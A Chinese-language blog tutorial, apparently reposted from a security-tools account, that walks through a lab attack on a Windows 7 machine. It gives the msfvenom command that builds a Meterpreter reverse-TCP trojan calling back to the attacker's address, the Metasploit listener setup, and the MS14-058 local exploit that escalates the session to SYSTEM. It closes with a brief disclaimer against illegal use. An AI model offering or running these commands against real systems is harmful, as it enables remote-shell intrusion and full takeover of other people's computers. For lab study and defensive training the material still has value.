內網滲透 -- 提升權限(利用提權漏洞)

沉默不是沒有情緒,是感覺沒有再說的意義。。。。

----  網易雲熱評

環境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.137

 

一、生成木馬

1、查看Windows下可利用的payloads

msfvenom -l payloads | grep windows | grep tcp

2、選擇windows/meterpreter/reverse_tcp並生成木馬

-p 選擇一個payload

-l 載荷列表

-f 生成的文件格式

-e 編碼方式

-i 編碼次數

-b 在生成的程序中避免出現的值

-x 允許我們指定一個自定義的可執行文件作爲模板,也就是將木馬捆綁到這個可執行文件上

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -b"\x00" -f exe > aiyou.exe

3、/root目錄下會生成一個aiyou.exe文件

二、通過Metasploit監聽小受

1、啓動Metasploit,use exploit/multi/handler

2、設置payload,set payload windows/meterpreter/reverse_tcp

3、設置監聽,set lhost 192.168.1.133

4、設置監聽端口,set lport 4444

5、run

6、將生成的aiyou.exe拷貝到小受中並運行,getuid查看權限,普通用戶

 

三、提權漏洞(ms14_058)

1、選擇提權漏洞:use exploit/windows/local/ms14_058_track_popup_menu

2、查看需要設置的參數:show options

3、設置session值:set session 1,執行run

4、重新生成一個session,查看權限

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

 

 

禁止非法,後果自負

歡迎關注公衆號:web安全工具庫

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章